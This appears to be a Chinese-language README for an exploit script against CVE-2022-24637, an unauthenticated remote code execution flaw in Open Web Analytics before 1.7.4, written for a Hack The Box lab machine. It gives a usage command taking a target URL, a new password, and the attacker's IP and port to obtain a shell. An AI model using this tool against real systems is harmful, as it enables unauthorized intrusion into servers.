Open Web Analytics 版本 <1.7.4 中的未授权远程代码执行
此脚本旨在自动化利用 CVE-2022-24637 漏洞。我为我的 Hackthebox 机器 vessel 编写了这个漏洞利用程序。https://app.hackthebox.com/machines/Vessel
漏洞利用及其思路基于 https://devel0pment.de/?p=2494
使用以下参数运行脚本:
python3 exploit.py http://<url>/ newPassword YourIp YourPort
可能需要多次运行才能获取 shell。
此脚本可以进一步改进。
